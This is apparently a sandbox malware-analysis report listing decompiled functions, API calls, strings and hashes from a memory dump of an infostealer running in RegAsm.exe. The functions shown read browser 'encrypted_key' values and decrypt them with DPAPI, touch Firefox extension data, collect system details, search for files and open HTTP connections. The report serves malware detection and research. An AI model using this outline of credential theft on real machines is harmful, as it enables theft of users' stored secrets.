Opcode ID: 743ad9ba178558877cd58863c72fe045ae92a40ff35b6a5f713e402a9c9f5b19
Instruction ID: b718fa69326062dfc4f54fe07fb295f5af6a4f5bbf93e191d44b1700fcb0c4ca
Opcode Fuzzy Hash: 743ad9ba178558877cd58863c72fe045ae92a40ff35b6a5f713e402a9c9f5b19
Instruction Fuzzy Hash: C321DA71741218ABEB14BF24DC84BAE73B9EB46704F520519F947A7681EB60BC048794

Function 00404AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID:
API String ID: 1274457161-0
Opcode ID: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction ID: f1c5382da97c9dd65e4db87c3c806c9c9b4e03b01775002e3606c6f6cd357758
Opcode Fuzzy Hash: f25c82f9083139f9dc305e99f373a1749f43e790606f1cfdd691ee0f4a79a4b6
Instruction Fuzzy Hash: E9011B72D00218ABDF149BA9DC45ADEBFB8AF55330F10821AF925F72E0DB745A058B94

Function 004083D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87libraryCOMMON

Download Yara Rule

APIs

GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,0040DB0A), ref: 004083F2

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

SetEnvironmentVariableA.KERNEL32(?,00437194,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,004367C3,?,?,?,?,?,?,?,?,0040DB0A), ref: 00408447
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0040DB0A), ref: 0040845B

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 004083E6, 004083EB, 00408405

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-1193256905
Opcode ID: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction ID: 1d1035b7872eafe5bc2acfcfd9c5443481a9431a5cd399c5b03dff48eed801cb
Opcode Fuzzy Hash: 04dcee5354247dbc29cf1765c19ad916d25bce8febd7e9a612e053264f62c16e
Instruction Fuzzy Hash: 20315C71940714ABCF16EF2AED0245D7BA2AB48706F10607BF440B72B0DB7A1A81CF89

Function 00416DC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55stringCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00416DCD
lstrlenA.KERNEL32(?,0000001C), ref: 00416DD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416E5C

Strings

ERROR, xrefs: 00416E54

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog3_catchlstrlen
String ID: ERROR
API String ID: 591506033-2861137601
Opcode ID: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction ID: af559da7a52deda925aca90371b7d636d26c87dd73bd3b1907a7f448f6be4e16
Opcode Fuzzy Hash: 987378090a3b2abee121885682ea4995d8af358216b926a009c89c00a445330c
Instruction Fuzzy Hash: 6F119371900509AFCB40FF75D9025DDBBB1BF04308B90513AE414E3591E739EAA98FC9

Function 0041224A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
CloseHandle.KERNEL32(00000000), ref: 0041228E

Strings

=A, xrefs: 0041225D, 00412262

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID: =A
API String ID: 3183270410-2399317284
Opcode ID: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction ID: 00f88837b3f4b8dbd17d966d98a560f1caae43d713f472eddac2d47ecb876e1e
Opcode Fuzzy Hash: a5843cda12b70cc7bcbf256d8a6036821e346dccf5e361165451a22e509f8efe
Instruction Fuzzy Hash: D8F0B471600218ABDB24EB68DC45FEE7BBC9B48B08F00006AF645D7180EEB5DAC5CB55

Function 0040B332 Relevance: 6.2, APIs: 4, Instructions: 196filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437414,0043681B,?,?,?), ref: 0040B3D7
lstrlenA.KERNEL32(?), ref: 0040B529
lstrlenA.KERNEL32(?), ref: 0040B544
DeleteFileA.KERNEL32(?), ref: 0040B596

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99

Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
lstrlenA.KERNEL32(?), ref: 0040D4B2

Strings

moz-extension+++, xrefs: 0040D4DD
^userContextId=4294967295, xrefs: 0040D4D7

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 161838763-3310892237
Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9

Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5

Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093

Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD

Strings

, xrefs: 00408241
"encrypted_key":", xrefs: 004081DF
DPAPI, xrefs: 0040821B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 2311102621-738592651
Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58

Function 00410F51 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction ID: 198c8e352812e869def4411d780e2caea40c147a773264a459f6a712475eeb20
Opcode Fuzzy Hash: 516f2c0c8b5e6a914cb95f881748b3b593324cf3efc2baeb97f22068c18ac649
Instruction Fuzzy Hash: C9F03075640304FBEF148B90DC0AFAE7B7EEB44706F141094F601A51A0E7B29B509B60

Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
lstrcatA.KERNEL32(?), ref: 00416396

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Strings

nzA, xrefs: 004164AE

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID: nzA
API String ID: 153043497-1761861442
Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55

Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
